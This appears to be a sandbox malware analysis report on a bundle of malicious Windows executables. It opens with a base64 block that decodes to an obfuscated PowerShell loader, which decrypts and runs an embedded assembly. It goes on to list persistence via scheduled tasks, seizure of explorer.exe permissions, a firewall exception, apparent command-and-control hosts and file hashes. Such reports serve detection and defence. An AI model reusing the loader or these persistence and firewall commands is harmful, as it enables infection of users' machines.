icGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe

ac3.exe

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1"

C:\Windows\SysWOW64\PING.EXE

ping trustsentry.com -t -n 1 -s 4 -4

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\PING.EXE

ping ya.ru -t -n 1 -s 4 -4

C:\Windows\SysWOW64\PING.EXE

ping tria.ge -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy bloatware C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy beastify.url C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy shell1.ps1 C:\Users\Admin\Desktop

C:\Program Files (x86)\DroidCam\vc_redist.x86.exe

"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet

C:\Program Files (x86)\DroidCam\vc_redist.x86.exe

"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{C5BD4162-E564-4F77-B365-36BD5383442A} {309B46C4-58D8-4921-9D7C-3B790364B964} 1952

C:\Windows\SysWOW64\cmd.exe

cmd /c install.bat

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "DroidCamFilter32.ax"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "DroidCamFilter64.ax"

C:\Windows\system32\regsvr32.exe

/s "DroidCamFilter64.ax"

C:\Program Files (x86)\DroidCam\lib\insdrv.exe

"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{512bbd22-4f1b-194d-e1f1-cd06e8f26378}\droidcam.inf" "9" "6e67c8bbf" "00000000000005DC" "WinSta0\Default" "00000000000005D4" "208" "c:\program files (x86)\droidcam\lib"

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{540e316d-1e11-02b0-5321-292876b9ca2d} Global\{6eb0db00-4d67-6993-166d-7d1fdab5c452} C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005DC" "00000000000005FC" "00000000000005F8"

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\explorer.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\explorer.exe /grant Admin:(F)

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\System32\dwm.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\System32\dwm.exe /grant Admin:(F)

C:\Windows\SysWOW64\xcopy.exe

xcopy xcer.cer C:\Users\Admin\Desktop

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe

freebobux.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe

SolaraBootstraper.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im ctfmon.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat""

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll

wim.dll

C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe

clwcp c:\temp\bg.bmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd" "

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\cringe.mp4"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\lol.ini

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\mailgooglecom.json

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\CLOCK.py

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:734221 /prefetch:2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\x.vbs"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe

f3cb220f1aaa32ca310586e5f62dcab1.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:3748878 /prefetch:2

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SysWOW64\xcopy.exe

xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\regedit.exe

regedit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x584

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 https-login--microsoftonline--com.httpsproxy.net udp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
GB 142.250.200.19:80 https-login--microsoftonline--com.httpsproxy.net tcp
US 8.8.8.8:53 aadcdn.msftauth.net udp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 152.199.21.175:443 aadcdn.msftauth.net tcp
US 8.8.8.8:53 mrbeast.codes udp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.73.53.134:80 dwrapper-prod.herokuapp.com tcp
IE 54.73.53.134:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 exampledd.matomo.cloud udp
DE 18.157.122.248:80 exampledd.matomo.cloud tcp
US 8.8.8.8:53 a2957.q.akamai.net udp
GB 2.23.210.92:443 a2957.q.akamai.net tcp
FR 5.157.51.190:53 udp
ES 185.93.182.46:53 tcp
RS 152.89.160.205:983 tcp
ES 212.227.33.35:22 tcp
BG 185.216.32.42:443 tcp
US 74.208.156.127:53 tcp
DE 217.160.104.214:22 tcp
PL 5.157.22.182:22 tcp
JP 172.105.221.253:53 tcp
FR 57.128.125.147:80 57.128.125.147 tcp
US 8.8.8.8:53 ipfounder.net udp
US 8.8.8.8:53 jozzu420-51305.portmap.host udp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 trustsentry.com udp
US 8.8.8.8:53 ya.ru udp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 tria.ge udp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 8.8.8.8:53 having-jackson.gl.at.ply.gg udp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
N/A 127.0.0.1:50984 tcp
US 147.185.221.18:56522 having-jackson.gl.at.ply.gg tcp

Files

memory/2072-0-0x000000007403E000-0x000000007403F000-memory.dmp

memory/2072-1-0x0000000001210000-0x000000000126E000-memory.dmp

memory/2072-2-0x0000000000550000-0x0000000000574000-memory.dmp

memory/2072-3-0x0000000074030000-0x000000007471E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd

MD5 5bef4958caf537ac924b6ce01e1d1e13
SHA1 cf7a0805a98f3c16ca14c6e420e2ca44ad77a164
SHA256 e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d
SHA512 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.pack

MD5 34a66c4ec94dbdc4f84b4e6768aebf4e
SHA1 d6f58b372433ad5e49a20c85466f9fb3627abff2
SHA256 fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb
SHA512 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\spread.cmd

MD5 7a71a7e1d8c6edf926a0437e49ae4319
SHA1 d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1
SHA256 e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae
SHA512 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\doxx.cmd

MD5 013a01835332a3433255e3f2dd8d37d6
SHA1 8a318cc4966eee5ebcb2c121eb4453161708f96c
SHA256 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b
SHA512 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.didata

MD5 41b8ce23dd243d14beebc71771885c89
SHA1 051c6d0acda9716869fbc453e27230d2b36d9e8f
SHA256 bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7
SHA512 f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.edata

MD5 37c1a5c63717831863e018c0f51dabb7
SHA1 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378
SHA256 d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941
SHA512 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.idata

MD5 a73d686f1e8b9bb06ec767721135e397
SHA1 42030ea2f06f38d5495913b418e993992e512417
SHA256 a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461
SHA512 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\0.txt

MD5 c1672053cdc6d8bf43ee7ac76b4c5eee
SHA1 fc1031c30cc72a12c011298db8dc9d03e1d6f75c
SHA256 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb
SHA512 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.txt

MD5 8f2f090acd9622c88a6a852e72f94e96
SHA1 735078338d2c5f1b3f162ce296611076a9ddcf02
SHA256 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4
SHA512 b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\CERTIFICATE.cer

MD5 c07164d3b38ca643290adaa325e1d842
SHA1 895841abf68668214e5c8aa0a1600ff6b88e299d
SHA256 da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600
SHA512 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\data.txt

MD5 4c195d5591f6d61265df08a3733de3a2
SHA1 38d782fd98f596f5bf4963b930f946cf7fc96162
SHA256 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146
SHA512 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\i.txt

MD5 d40fc822339d01f2abcc5493ac101c94
SHA1 83d77b6dc9d041cc5db064da4cae1e287a80b9e6
SHA256 b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6
SHA512 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\_.txt

MD5 ad6e46e3a3acdb533eb6a077f6d065af
SHA1 595ad8ee618b5410e614c2425157fa1a449ec611
SHA256 b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459
SHA512 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\CODE2000.TTF

MD5 052eaff1c80993c8f7dca4ff94bb83ca
SHA1 62a148210e0103b860b7c3257a18500dff86cb83
SHA256 afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c
SHA512 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\readme.txt

MD5 d6b389a0317505945493b4bfc71c6d51
SHA1 a2027bc409269b90f4e33bb243adeb28f7e1e37b
SHA256 d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c
